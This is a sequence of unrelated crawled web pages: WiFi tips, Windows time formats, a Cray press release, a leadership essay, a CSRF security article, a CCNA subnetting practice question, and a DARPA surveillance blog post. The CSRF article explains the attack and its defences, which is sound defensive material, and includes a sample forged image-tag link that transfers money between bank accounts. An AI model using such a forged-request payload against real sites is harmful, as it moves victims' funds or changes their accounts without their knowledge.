- Choose a strong WiFi password/passphrase: Choose a passphrase that is unique, and difficult to guess. An example of a strong passphrase is: FG$$#gat1299MDB; more than 8 characters, alphanumeric with non-standard characters included, not a dictionary word.
- Change your WiFi passphrase regularly: Anyone you’ve given the password to will have access to your WiFi network, and you cannot always guarantee the secrecy of your passphrase in the hands of others. Changing your passphrase regularly will help protect you should your passphrase be obtained by an untrustworthy source.
- Disable access when not in use: If you plan on leaving your home for a long period of time, for example while on vacation, power off your router. This will ensure that no one will be able to gain unauthorized access while you are away.
- Enable MAC filtering: Every computer or device that connects to a WiFi network has its own unique identifier, a MAC address, similar to the license plate on your vehicle. By enabling MAC filtering you can restrict access to the MAC addresses you pre-approve in your router's configuration. Every other address is rejected.
Many of these settings can be easily configured with the help of your router’s quick-start guide or user manual. If you have questions or would like assistance with your WiFi network, please contact our helpdesk for a consultation. | <urn:uuid:02105f13-bc96-4e06-a676-4abd0324d834> | CC-MAIN-2017-04 | http://wiki.sirkit.ca/2012/12/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00056-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.905841 | 553 | 2.953125 | 3 |
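The passphrase guidance above (more than 8 characters, mixed case, digits, and non-standard characters) translates directly into a quick self-check. This is a rough sketch; a real checker would also reject dictionary words and previously used phrases.

```python
import string

def is_strong_passphrase(p, min_len=9):
    """Check a WiFi passphrase against the rules of thumb above:
    length over 8 plus upper case, lower case, digit, and symbol."""
    return (len(p) >= min_len
            and any(c.isupper() for c in p)
            and any(c.islower() for c in p)
            and any(c.isdigit() for c in p)
            and any(c in string.punctuation for c in p))

print(is_strong_passphrase("FG$$#gat1299MDB"))   # True: the example above
print(is_strong_passphrase("password"))          # False: lowercase only
```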
Windows allows you to customize how the time is displayed so that it includes leading zeros or switches between 12 hour and 24 hour format. In order to do this, you need to change these settings within the Region control panel. The Region and Language control panel allows you to customize how the time is displayed on your computer, how currency is shown, and how numbers are formatted. Using this control panel we can control how the time is displayed and customize it exactly as we wish.
In Windows Vista and Windows 7, you can click on the Start button and type Region. When the Region and Language search result appears, please click on it. On Windows 8, type Region from the Start Screen and then click on the Settings category. Then click on the Region search result. You should now see the Region control panel.
Click on the Additional settings button and you should now be at the Customize Format screen.
Now click on the Time tab to get to the section where you can customize how the time is displayed in Windows.
In this screen you can change how Windows displays the time by specifying different format strings, or notations, in the Short Time and Long Time fields. This notation is then substituted by the particular data that it represents. For example, the h notation means 12 hour time, while the H notation means 24 hour time. Therefore, if you had a time notation of h:m:s tt, the time would read 4:18:12 PM. On the other hand if you had a notation of H:m:s tt the time would read 16:18:12 PM. Notice that since we used the H notation, the time was shown in 24 hour format.
It is also important to note that the time tab will have two time strings called Short time and Long time. The Short time field represents a short notation that will typically just show hours and minutes and a time period (AM/PM). Long time, on the other hand, will represent a longer notation that also displays the seconds. For the most part, when Windows displays the time it will be using the notation from the Long time. Therefore, if you wish to change how Windows displays the time, you would want to modify the Long time notation.
Below is a table explaining the various notations and how they affect the display of the time.

| Notation | Description | Example notation | Example display |
|----------|-------------|------------------|-----------------|
| h | The current hour in 12 hour format. | h:m:s | 4:9:3 |
| hh | The current hour in 12 hour format with leading zeros. | hh:m:s tt | 04:9:3 PM |
| H | The current hour in 24 hour format. | H:m:s tt | 16:9:3 PM |
| HH | The current hour in 24 hour format with leading zeros. | HH:m:s tt | 05:9:3 AM |
| m | The current minute. | h:m:s | 4:9:3 |
| mm | The current minute with leading zeros. | h:mm:s | 4:09:3 |
| s | The current second. | h:mm:s | 4:09:3 |
| ss | The current second with leading zeros. | h:mm:ss | 4:09:03 |
| tt | The AM or PM symbol. | h:mm:ss tt | 4:09:03 PM |
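As an aside for readers comfortable with a little scripting, the substitution behavior in the table can be mimicked with a short Python sketch. This is only an illustration of the notation rules — the function is my own, not something Windows uses:

```python
from datetime import time

def fmt(t, notation):
    """Expand Windows-style time notation tokens (illustrative only)."""
    h24 = t.hour
    h12 = h24 % 12 or 12                       # 0 and 12 both display as 12
    tokens = [                                  # longest tokens checked first
        ("HH", f"{h24:02d}"), ("hh", f"{h12:02d}"),
        ("mm", f"{t.minute:02d}"), ("ss", f"{t.second:02d}"),
        ("tt", "AM" if h24 < 12 else "PM"),
        ("H", str(h24)), ("h", str(h12)),
        ("m", str(t.minute)), ("s", str(t.second)),
    ]
    out, i = "", 0
    while i < len(notation):
        for tok, val in tokens:
            if notation.startswith(tok, i):
                out += val
                i += len(tok)
                break
        else:                                   # literal character (":", " ", ...)
            out += notation[i]
            i += 1
    return out

print(fmt(time(16, 9, 3), "h:mm:ss tt"))       # 4:09:03 PM
print(fmt(time(16, 9, 3), "HH:mm:ss"))         # 16:09:03
```

Swapping the notation string between these forms is exactly what editing the Long time field in the Customize Format dialog does for you.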
To change how Windows displays the time, simply use the above table as a reference to change the notation in the Long time field. Once you change the notation, you can have it go into effect by pressing the Apply button on the Customize Format screen and then pressing OK. Then press Apply and OK on the Region control panel screen. Windows should now be displaying the modified time string. If you wish to revert to the default US English time format, you can set it to h:mm:ss tt.
Latest Computer Models Zoom Down to Level of Individual Storm Cells
SEATTLE, WA, Aug 29, 2007 (MARKET WIRE via COMTEX News Network) -- Global supercomputer leader Cray Inc. (NASDAQ: CRAY) today announced
that scientists have leveraged the power of a Cray supercomputer at
the Pittsburgh Supercomputing Center (PSC) to break new ground in
weather prediction. Researchers from the University of Oklahoma's
Center for Analysis and Prediction of Storms (CAPS) and the National
Oceanic & Atmospheric Administration (NOAA) employed an innovative
combination of high resolution and controlled manipulation of
numerical model parameters and starting conditions to develop
strategies that will allow forecasters to better anticipate the
formation of severe storms and the supercells that give birth to
destructive tornadoes. The research was part of the NOAA Hazardous
Weather Testbed (HWT) Spring Experiment.
"Each day during the Spring Experiment that was conducted from
mid-April through early June, CAPS scientists applied emerging
scientific methods to design a 10-member 'ensemble' of forecasts from
the Weather Research and Forecasting, or WRF, software model,"
explained Dr. Ming Xue, director of CAPS. "Each member had a
4-kilometer horizontal resolution and covered almost the entire
continental U.S. Unlike a single-model forecast, this ensemble not
only predicted when and where particular weather might occur, but
also the likelihood of its occurrence."
"Ensembles have been employed by larger-scale weather models before,
but they've never been focused on the few-kilometer scales where
individual storms actually occur," Dr. Xue continued. "The ensemble
approach is exceptionally demanding when it comes to computational
power and can only be accomplished on a high-performance, scalable
system such as the Cray XT(TM)-based system at PSC."
Every day during the course of the experiment, terabytes (trillions
of bytes) of data were generated, archived and transferred from PSC to
Norman, Oklahoma, for use in forecasts, evaluations and future
analysis and research. The HWT facility in Norman is strategically
located in the recently built National Weather Center between the
operational forecast areas of the NOAA Storm Prediction Center (SPC)
and the NOAA National Weather Service Norman Forecast Office. These
two offices, together with the NOAA National Severe Storms Laboratory
(NSSL), led the experiment during the time of year when severe storm
activity typically peaks in the region.
"The researchers had previously struggled to complete a single
modeling run per day, thus hampering a comprehensive understanding of
how severe storms and tornadoes form," said Per Nyberg, Cray
Marketing Director for Earth Sciences. "The scalability and sustained
performance of the Cray XT system at PSC allowed them to complete 11
runs each day while using more sophisticated parameterizations. This
is a key step in helping forecasters predict violent storms in time
to prevent injury and loss of life."
About the NOAA Hazardous Weather Testbed Spring Experiment
The Spring Experiment conducted jointly by the SPC and NSSL would not
have been possible without contributions from multiple partners. These
two organizations, along with NOAA's Environmental Modeling Center
(EMC) and the National Center for Atmospheric Research (NCAR), worked
with CAPS and PSC in the design and execution of the ensemble
forecasts. In addition, EMC and NCAR provided separate
high-resolution WRF model forecasts for a complementary portion of
the experiment. The WRF model was developed primarily at NCAR and
EMC. The CAPS forecasts were produced under the support of the NOAA
CSTAR program and the National Science Foundation Linked Environments
for Atmospheric Discovery Large ITR project. The NSF TeraGrid and
National Lambda Rail networks connected the groups in Pittsburgh and
Norman. Go to http://hwt.nssl.noaa.gov/Spring_2007/ for more information.
About Cray Inc.
As a global leader in supercomputing, Cray provides highly advanced
supercomputers and world-class services and support to government,
industry and academia. Cray technology enables scientists and
engineers to achieve remarkable breakthroughs by accelerating
performance, improving efficiency and extending the capabilities of
their most demanding applications. Cray's Adaptive Supercomputing
vision will result in innovative next-generation products that
integrate diverse processing technologies into a unified
architecture, allowing customers to surpass today's limitations and
meeting the market's continued demand for realized performance. Go to
www.cray.com for more information.
Cray is a registered trademark, and Cray XT is a trademark, of Cray
Inc. All other trademarks are the property of their respective owners.
SOURCE: Cray Inc. | <urn:uuid:5ffc0a6d-5e9f-45cb-8b93-52ad4db65f03> | CC-MAIN-2017-04 | http://investors.cray.com/phoenix.zhtml?c=98390&p=irol-newsArticle&ID=1045957&highlight= | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00268-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.887098 | 1,030 | 2.578125 | 3 |
My favorite definition of leadership comes from Warren Bennis: "Leadership is a function of knowing yourself, having a vision that is well communicated, building trust among colleagues, and taking effective action to realize your own leadership potential."
But I must add to this, borrowing from John C. Maxwell, who simply stated, "Leadership is influence -- nothing more, nothing less."
Followers are influenced by leaders either by a carrot or stick, or by something better; something they believe in -- vision. There are good leaders and bad leaders; there are Stalins and Hitlers as there are Roosevelts and Churchills. Each had a vision -- good or evil -- and influence over others -- whether by trust or coercion. Bennis' definition of leadership encompasses traits such as "vision, communication, trust and effective action."
These are critical traits, for a leader must have a defined vision of what needs to be achieved, communicate it comprehensibly to others so they are inclined to share it -- and have the trust of colleagues that they have the skills necessary to realize the vision -- and can deliver it.
These traits could be further defined to include practicality, realism, creativity, innovation, technical competence, human compassion and understanding, integrity, faith, intelligence, etc. Therefore, leadership is multidimensional -- it requires several traits rolled into one individual.
Management is the art of how to do something well. Or to quote Bennis again, "Managers are people who do the things right and leaders are people who do the right thing." We all know managers -- they make sure account ledgers are correct and books are balanced; they ensure the buses run on time; they make sure 911 calls are answered in x number of minutes, etc. We need managers.
But leaders challenge the status quo through innovation and energize people looking out to the future. Leaders see opportunities that can make an organization perform better rather than making an organization meet stated metrics. Most importantly, leaders can get a reticent organization to adopt a new direction or change how it does business to achieve better performance and even change the culture of an organization.
Changing Politics and Culture
All leaders at their level or organizational sphere need to understand the environment (internal and external) in order to exert influence and change the organizational behavior to a desired outcome. This is where it all comes together, where leadership success or failure occurs.
The word politics is often perceived as dirty. It invokes a sense of distrust, self-serving actions for an individual or specific group's gain, and conjures up images of dishonest politicians. The official definition is "the process and conduct of decision-making for groups."
Politics is a very basic human characteristic, and one can see politics being played out in groups or organizations. The power or ability to impose one's will on another is a key tenet of politics -- it is sought and used to make decisions that favor a particular individual or group, or in plainer text, those who get to make the rules. The key here is that organizations are collections of humans, each of whom has individual needs and wants, and vie for decision-making power that suits their own objectives.
Organizations compete with other organizations for power, prestige, influence and resources. So while many may scoff at politics, it is simply human nature; to be an effective leader, one must understand both internal and external politics that affect an organization, particularly who the key stakeholders are. This is a particularly important consideration in government where power is diffused through law and government structures, and where there is a lack of market forces. This environment requires greater attention to coalition-building and assessing the effects of change on an organization in which internal sub-groups and external interest groups have a stake. Attempting change without lining up support -- or power -- can bring about failure or other unintended consequences.
Leaders have an important role in forming and changing organizational culture in reaction to, or in anticipation of, a changing environment. Organizations and their members are survivalists and must successfully adapt to a constantly changing environment. Making a bad decision can have disastrous consequences for both, in terms of survival or status.
I know this sounds fairly Darwinian, but one of the most perplexing questions I have continually asked myself throughout my career is, "Why are organizations and their members incredibly resistant to change, even though the change is well thought out, rational and beneficial?" Perhaps I thought they debated and vetted the change internally first before blindly accepting it; perhaps this is a good idea to simply avoid a bad decision, or change for the worse, which would threaten its survival.
So now that we've covered leadership, management, politics and culture -- how do these relate to public-sector leaders and CIOs? As I said before, public-sector organizations are designed to operate in a diffuse power environment, and market forces don't readily apply to the public-sector environment as they do in the private sector, though political forces are very key to public-sector environments.
After all, government makes rules for all of us, and therefore is subject to intense political forces. Bureaucracies are somewhat constrained by checks and balances coming from multiple oversight bodies, media attention and numerous rules that guide their mission and power, and tend to change more gradually than their private-sector counterparts. Though in rare events such as war or depression, strong political forces can produce rapid and efficient change.
Unlike their private-sector counterparts, public-sector leaders do not receive handsome rewards for leading rapid change; in fact, one may say they are rewarded for slow change. That makes their jobs more interesting and challenging in affecting their vision because they must convince a diverse set of stakeholders to support them in that vision and garner their help to achieve it.
CIOs are unique executives -- they make their living by introducing technology to an organization that requires them to be lead change agents since technology almost always leads to a change in business processes. CIOs must earn the trust of their leadership and peers in their ability to create an organization capable of delivering key technology systems.
Through this trust they can garner more support to introduce new systems by being meticulous in how they are affecting organizational culture. A CIO who cannot deliver technology effectively to his or her key customers (i.e., police, fire, transportation, etc.) will not be trusted, and therefore will be ineffective. Like all leaders, CIOs must assess their own organization and environment, and change it to deliver key systems.
A CIO in the public sector is like his peers (CFOs, police chiefs, etc.) -- a member of a team with a specific role. As a team member, he or she must be trusted to deliver. I know this sounds basic, but sometimes delivering -- much as a CEO delivers shareholder value -- requires a great deal of leadership.
A CIO is part of a team and must work as a trusted member of his or her organization's senior management team, and in full alignment with the secretary. While most outsourcing engagements in the private sector are done rapidly, implementation of the Maryland Department of Transportation's (MDOT's) standardized network and communications system took about three and a half years. The additional time was needed to build the support in a diffuse power environment of a large government organization. The outcome, however, was the same.
One of my favorite comments on the project to create a standardized network and communications system was when the capital planning director, a very seasoned and well respected individual, came to me and said, "Whew, you know you really took us [MDOT] to the brink on this one, I had my doubts we would get through, but you and the CFO seemed to know just when to pull back and push forward. In the end, we would never have achieved this any other way -- thanks." | <urn:uuid:014ec69b-bf62-47fd-a0f1-5984832c32e4> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/pcio/Influence-and-the-Art-of-Doing.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00268-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.966017 | 1,592 | 2.5625 | 3 |
What You'll Learn
- Components of a database and how to work with those components
- Open a table, find information stored there, and enter data
- Create several query types, edit and run queries, and use action and calculation queries
- Create several report types, enhance reports, and print preview reports
- Preview and print database objects, and change the page setup options
Who Needs To Attend
Those who are new to Microsoft Access 2010 | <urn:uuid:9d0c0bea-412c-4f69-92aa-4ad64b4e9f57> | CC-MAIN-2017-04 | https://www.globalknowledge.com/ca-en/course/116311/microsoft-access-2010-level-1-data-entry-and-reports/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00296-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.870087 | 92 | 3.15625 | 3 |
Five Ways to Reduce Your Vulnerability to CSRF Attacks
Are any corporate Web applications running on your network susceptible to cross-site request forgery (CSRF)? It's a question worth asking, because a successful CSRF attack -- aka an XSRF, Sea Surf, session riding, hostile linking, or One-Click attack -- can have devastating consequences, potentially costing your company a great deal of money or resulting in the loss of confidential information.
So what is CSRF?
A CSRF attack causes your Web application to carry out an action (such as transferring money, making a purchase or changing an account password) by making the application believe that the request resulting in this action is coming from an authorized user of the application. That could be an employee at your company, a business partner, or an external customer.
To achieve this, a CSRF attack relies on the fact that many Web applications use nothing more than a cookie with a relatively long expiration time to enable users to continue accessing the application after they initially authenticate themselves.
For a CSRF attack to work, then, a potential victim first has to use their browser to authenticate themselves and log on to your Web application. As long as the user does not subsequently log out of the application, and until the cookie from the application in the user's browser expires, the user is a potential victim of a CSRF attack.
How does a CSRF attack work?
To carry out a CSRF attack, a hacker places a specially crafted link to your Web application (which a potential victim is known to use) on some other Web page or in an email. But rather than making the link a standard hyperlink, the hacker typically hides the link by placing it in an image or script tag, with the link as the image's or script's source.
An example of such a link (adapted from Wikipedia) is:

`<img src="http://bank.example.com/transfer?from=bob&to=mallory&amount=100000">`
Now if the victim views the Web page with this "image" on it in their browser, or reads an email containing this link in an email program which uses the browser's HTML rendering capabilities, the browser will attempt to fetch the "image" by following the link. And if the victim has recently logged in to the site, their browser will provide a cookie to authenticate, and tell the Web application to transfer $100,000 from the account "bob" to the account "mallory." In general there is no reason that the victim would know that the transaction has been carried out (at least until they check their bank balance) because the victim's browser would carry out the transaction without displaying any feedback (such as a confirmation Web page) from bank.example.com.
In the example above, the link is specifically targeted at bob, which limits its usefulness. In practice a hacker is likely to use a more generic link that would work with any potential victim who happens to be logged in to your Web application. But crafting a successful CSRF attack is hard for the attacker precisely because they get no feedback from your Web application during the attack. That means the attack is only likely to succeed as long as the responses from your Web application are entirely predictable, and involve nothing more than further clicks (for example, to confirm a transaction) which can be included in a script.
So for your Web application to be susceptible to a CSRF attack, it must:
- Allow access to users with nothing more than a valid cookie with a usefully long time before expiry
- Allow transactions to be carried out on submission of a suitable URL that can be sent from an external site
- Respond in a predictable way
What can a CSRF attack achieve?
Although a CSRF attack can "only" carry out a transaction in a Web application, the results can be very far-ranging indeed. For example, it could result in the victim unwittingly making a forum posting, subscribing to a mailing list, making purchases or stock trades, or carrying out activities such as changing a user name or password. CSRF attacks also work on applications behind the same firewall as the victim, and can allow a hacker to access an application whose access is restricted by IP range if the victim's machine is within that range.
A strange twist on CSRF is called login CSRF, which logs a victim into a Web application using the attacker's credentials. This allows the hacker to log in subsequently and retrieve information about the victim, such as the user's activity history, or any confidential information that has been submitted by the victim.
How to mitigate the risk of your Web applications being vulnerable to CSRF attacks
- Limit the time-to-expiration of authentication cookies. The shorter the period in which these cookies are valid, the smaller the window of opportunity for a hacker to exploit your Web application. However, the shorter the period the more inconvenient it is for users. In the end, as is often the case, there is a compromise to be made between convenience and security.
- Make users submit additional information before allowing important transactions to be carried out. Requiring a user to solve a CAPTCHA or enter a password before important transactions can be carried out can prevent a hacker from carrying out an attack (as long as the password is not stored in the browser) because this information is not predictable (CAPTCHA) or freely available (password).
- Use secret non-predictable validation tokens. CSRF attacks work when a session is identified only by the cookie stored in the user's browser, so they can be foiled by including additional session-specific information in each HTTP request that an attacker can't know in advance and therefore can't add to a link. Note, however, that if the application has an existing cross-site scripting vulnerability, a hacker might still be able to read this validation token.
- Use custom HTTP headers. The XMLHttpRequest API can be used to protect against CSRF attacks if all requests that carry out a transaction use XMLHttpRequest and attach a custom HTTP header, rejecting any such requests which lack the custom header. This is useful because browsers normally only allow sites to send custom HTTP headers to the same site, thus preventing a transaction being initiated from the site which is the source of the CSRF attack.
- Check the referrer header. When a browser sends an HTTP request it usually includes the URL it originated from in the Referer header. In theory you can use this information to block requests that originate from another site rather than from within the Web application itself. Unfortunately the Referer header is not always present (some organizations strip it out for privacy reasons, for example) and it can be spoofed, so this measure is not really effective on its own.
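To make the validation-token and custom-header ideas concrete, here is a minimal server-side sketch in Python. This is my illustration rather than code from the article; the secret value, the X-Requested-With header convention, and all function names are assumptions:

```python
import hmac
import hashlib
import secrets

SECRET_KEY = b"load-this-from-server-side-config"  # assumption: kept secret on the server

def issue_csrf_token(session_id: str) -> str:
    """Derive a per-session token an attacker cannot predict.

    Embed the result in each form as a hidden field; a forged link
    can't include it because the attacker can't compute it.
    """
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def is_valid_csrf_token(session_id: str, submitted: str) -> bool:
    # Constant-time comparison avoids leaking the token byte-by-byte.
    return hmac.compare_digest(issue_csrf_token(session_id), submitted)

def is_same_origin_ajax(headers: dict) -> bool:
    """Custom-header check: browsers only let a page attach custom headers
    to same-origin XMLHttpRequest calls, so a request forged via an <img>
    tag or a cross-site form cannot carry this header."""
    return headers.get("X-Requested-With") == "XMLHttpRequest"

session_id = secrets.token_hex(16)                 # normally the session cookie value
token = issue_csrf_token(session_id)
print(is_valid_csrf_token(session_id, token))      # True
print(is_valid_csrf_token(session_id, "forged"))   # False
print(is_same_origin_ajax({"X-Requested-With": "XMLHttpRequest"}))  # True
```

A real framework would wire these checks into every state-changing route; the sketch only shows the two predicates themselves.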
Over the last five decades, microprocessors have gotten cheaper and more powerful as predicted by Gordon Moore’s famous observation, which states that the number of transistors on an integrated circuit doubles every two years. However, the limits of miniaturization can only go so far before crossing the quantum threshold.
Currently there is some progress left to exploit as the industry heads beyond 22-nanometer process technology, but doing so requires new tools. One of these indispensable tools is a chemical called a photoresist, sometimes shortened to “resist,” a light-sensitive liquid plastic used to etch the lines and features on a chip.
Chip designers recognized that in order to support ever-shrinking process geometries, a new kind of resist was needed. A collaboration formed between Intel and the US Department of Energy’s Lawrence Berkeley National Lab (Berkeley Lab) to address this challenge.
The research resulted in a much-improved resist that combines the properties of two existing kinds of resist and retains the best properties of both, i.e., better light sensitivity and mechanical stability.
“We discovered that mixing chemical groups, including cross linkers and a particular type of ester, could improve the resist’s performance,” says Paul Ashby, staff scientist at Berkeley Lab’s Molecular Foundry, a DOE Office of Science user facility. The research is written up in the journal Nanotechnology.
The process of transferring images onto a substrate is known as lithography. In chipmaking, the wafer is first cleaned and then coated with a layer of photoresist. Then ultraviolet light is used to project an image of the desired circuit pattern including components such as wires and transistors. The resist exposed to the light hardens and the non-exposed part is chemically washed away.
The issue with today’s resists is that they aren’t compatible with the new light source used in extreme ultraviolet lithography (EUVL), which is necessary for smaller process nodes. EUV light has a much shorter wavelength – just 13.5 nanometers – than the current standard, deep ultraviolet light, which has wavelengths of 248 and 193 nanometers.
“The semiconductor industry wants to go to smaller and smaller features,” explains Ashby, adding that “you also need the resist materials that can pattern to the resolution that extreme ultraviolet can promise.”
The Intel and Berkeley Lab researchers combined two types of resists in various concentrations to create the new material, which is suitable for patterning smaller feature sizes in tandem with EUVL. Next, the researchers plan to further optimize the new resist for even smaller componentry, down to the 10-nanometer node.
The research project was funded by Intel, JSR Micro and the DOE Office of Science, all of whom have a vested interest in keeping Moore’s law alive as long as possible. | <urn:uuid:f2c89a79-2521-4894-af0b-2efa5ddabc3a> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/07/17/new-photoresist-add-years-moores-law/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281746.82/warc/CC-MAIN-20170116095121-00414-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.936195 | 591 | 3.796875 | 4 |
In today’s CCENT/CCNA blog posting, we are going to look at a fairly complex subnetting question that is typical of what you would see on the CCENT 100-101 exam or the composite CCNA 200-120 exam. You are given a network topology diagram, as Cisco provides on the exam, along with a base scenario describing the desired design requirements. The key to this type of exam question is to read it very carefully and look for keywords like fewest, least, most, and less than, since multiple answers may actually work but only one will meet the exact requirements of the question. So let’s begin below, where Cisco sets the stage with the introduction to the exam question.
Refer to the exhibit. All of the routers in the network are configured with the ip subnet-zero command. Which network addresses should be used for Link A and Network A with the fewest wasted IP addresses? (Choose two.)
CCNA Subnetting Question
One of the things that surprises many students taking their first CCENT (Cisco Certified Entry Networking Technician) 100-101 or CCNA (Cisco Certified Network Associate) 200-120 exam is that the questions are not straightforward, simple networking theory. I hear it time and time again from people who thought they could guess their way through a Cisco certification exam. While that might have been true 10 years ago, with easy multiple-choice questions where you could rule out two of the four answers and have a 50/50 chance, it is no longer like that on today’s Cisco exams. That is why Cisco is one of the premier certifications out there. So now take a look at the possible answers below and let’s try to determine which are correct. One thing that might help you is to write down the subnet chart on the erasable board you are given when you enter the testing center. This way you don’t have to work out the subnet ranges and masks multiple times across the 10 or so subnetting questions you are bound to receive on the exam. This will save you precious moments that you will need on your exam!
A. Network A – 192.168.13.0/24
B. Network A – 192.168.13.0/25
C. Network A – 192.168.13.128/26
D. Link A – 192.168.10.0/29
E. Link A – 192.168.10.0/30
F. Link A – 192.168.10.2/30
VLSM, CIDR, Subnetting Explanation and Answer Overview
In this question, you need to refer to the topology diagram in the upper left-hand corner to note that Network A needs 129 hosts. Therefore, we need to determine the correct subnet mask. Only one answer fits, and it is A: a /24 provides 254 usable host addresses. Answers B and C are incorrect since neither of them can accommodate all the host IP addresses that are needed in Network A. Answer B would give us only 126 hosts and answer C would give us only 62 hosts.
Link A is a point-to-point link, so the appropriate subnet mask is /30, which means both E and F are possibilities. However, answer F is wrong because 192.168.10.2/30 is not a network address. Between D and E, D would give us 6 possible hosts whereas E gives us exactly the 2 usable hosts a point-to-point link needs. Thus answer E wastes the fewest IP addresses and is correct.
So our correct answers for this exam question are A and E.
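Off the exam, you can double-check this subnetting math with a quick sketch in Python's standard ipaddress module. The smallest_prefix helper below is just an illustration for this post, not anything Cisco provides:

```python
import ipaddress
import math

def smallest_prefix(host_count):
    """Smallest IPv4 prefix whose usable hosts (2**h - 2) cover host_count."""
    host_bits = math.ceil(math.log2(host_count + 2))
    return 32 - host_bits

# Network A needs 129 hosts -> /24 (254 usable); a /25 only yields 126.
print(smallest_prefix(129))  # 24

# Link A is point-to-point: 2 hosts -> /30 (exactly 2 usable).
print(smallest_prefix(2))    # 30

# Cross-check the usable host counts behind each answer choice.
for cidr in ("192.168.13.0/24", "192.168.13.0/25", "192.168.13.128/26",
             "192.168.10.0/29", "192.168.10.0/30"):
    net = ipaddress.ip_network(cidr)
    print(cidr, net.num_addresses - 2)
```

Running this confirms that /24 is the smallest mask among the choices that covers 129 hosts, and that a /30 leaves exactly 2 usable addresses for the point-to-point link.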
Want to really turbo charge your CCENT and CCNA learning? Look at building your very own CCNA home lab! With your own lab you will be able to see these subnetting concepts and so much more in action. It will not only help you pass your certification exam easily, it will help prepare you for the real world. As passing the exam is only the first part of the equation. Next you will interview and you will want to have a leg up on all the other candidates with real world, hands-on experience that you can speak to in your interview. Just think how much more impressed the hiring manager will be that you took the initiative to invest in yourself. So if you are worth it, look at investing a few hundred dollars into your education to get that big paying Cisco job! | <urn:uuid:0d4275a0-734e-4afb-823a-e45727d57909> | CC-MAIN-2017-04 | https://www.certificationkits.com/ccent-100-101-ccna-200-120-detailed-subnetting-exam-question/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00048-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.956177 | 924 | 3.15625 | 3 |
While you may not be concerned about Santa Claus spying on you in real-time to find out if you are good or bad, he's not the only one who is making a list and checking it twice, planning to find out who is naughty or nice. Leave it to the DARPA, the Pentagon's research arm, to make Santa's magical powers of surveillance look quaint.
Satellites zooming in at any time on any spot on the globe to stream real-time video is like something you see in the movies, but DARPA has envisioned a giant spy eye with a massive contact lens peering down at our planet to meet national security needs. This lens would be about 66 feet in diameter and would be attached to a space-based spy telescope in order to hover in orbit and "take real-time images or live video of any spot on Earth." DARPA said such capabilities do not currently exist, but the Membrane Optical Imager for Real-Time Exploitation (MOIRE) program will change all of that.
"Today, aircraft are used for some imagery requirements," DARPA noted. "Because of the huge quantity of aircraft needed, and because aircraft do not fly high enough to see into denied territories, spacecraft are also used for imagery requirements." The listing on Federal Business Opportunities called for "innovative system-oriented research proposals in the area of large, low cost, lightweight, deployable, visible and/or infrared electro-optical systems for persistent, tactical, real-time video over denied territory for missile launch detection and tracking from geosynchronous orbit."
"Taking live video of a single location would require satellites to hover by matching the Earth's rotation in geosynchronous orbit about 22,000 miles (36,000 kilometers) high - but creating and launching a space telescope with the huge optics arrays capable of seeing ground details from such high orbit has proven difficult," reported MSNBC. Ball Aerospace has completed a proof-of-concept membrane optics review for the DARPA contract. "Such a telescope should be able to spot missile launcher vehicles moving at speeds of up to 60 mph on the ground. That would also require the image resolution to see objects less than 10 feet (3 m) long within a single image pixel."
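As a sanity check on those numbers, a back-of-the-envelope diffraction-limit calculation (Rayleigh criterion) is consistent with the reported figures. The 550 nm wavelength is my assumption for visible light; the 66-foot aperture and geosynchronous altitude come from the article:

```python
import math  # not strictly needed here, but handy for extending the sketch

# Rayleigh diffraction limit: theta ~ 1.22 * wavelength / aperture diameter.
wavelength_m = 550e-9          # green visible light (assumed)
aperture_m = 66 * 0.3048       # the article's 66-foot lens, in metres
altitude_m = 36_000e3          # geosynchronous orbit, ~36,000 km

theta_rad = 1.22 * wavelength_m / aperture_m
ground_resolution_m = theta_rad * altitude_m
print(f"{ground_resolution_m:.2f} m per pixel")
```

That works out to roughly 1.2 m per pixel, which squares with the claim of resolving objects "less than 10 feet (3 m) long within a single image pixel."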
According to Public Intelligence, this dream military space telescope could cost about $500 million. "It would be able to image an area greater than 100 x 100 km [almost 63 x 63 miles] with a video update rate of at least one frame a second, providing a 99% chance of detecting a Scud-class missile launch," reported Aviation Week.
This could give a whole new meaning to "you better watch out, you better not cry," because if you make it onto the naughty list next year, there may be real-time streaming from the giant eye in the sky, with recorded proof of how you've been bad or good.
This DARPA tech is not supposed to be aimed at regular folks like us, but it made me recall an ancient movie. This is not the portion showing the satellites zooming in on targets, but in today's world of tech this no longer seems so far-fetched.
Like this? Here's more posts:
- Can Microsoft Xbox's voice as a remote control win the hearts of Siri lovers?
- Fourth Amendment's Future if Gov't Uses Virtual Force and Trojan Horse Warrants?
- 4th Amendment vs Virtual Force by Feds, Trojan Horse Warrants for Remote Searches?
- Irony: Surveillance Industry Objects to Spying Secrets & Mass Monitoring Leaks
- Skype Exploits: I know where you are, what you are sharing, and how to best stalk you
- Real life HAL 9000 meets Skynet: AI controlled video surveillance society
- Lulzlover Hacked Coalition of Law Enforcement, Data Dumped for 2,400 cops and feds
- Privacy Nightmare: Data Mine & Analyze all College Students' Online Activities
- Busted! DOJ says you might be a felon if you clicked a link or opened email
- Microsoft Research: Hunting for HIV vaccine with techniques that fight spam
- Secret Snoop Conference for Gov't Spying: Go Stealth, Hit a Hundred Thousand Targets
- PROTECT-IP or control freaks? Monster Cable blacklists Sears, Facebook as rogue sites
- CNET Accused of Wrapping Malware in Windows Installer for Nmap Security Tool
- Do you give up a reasonable expectation of privacy by carrying a cell phone?
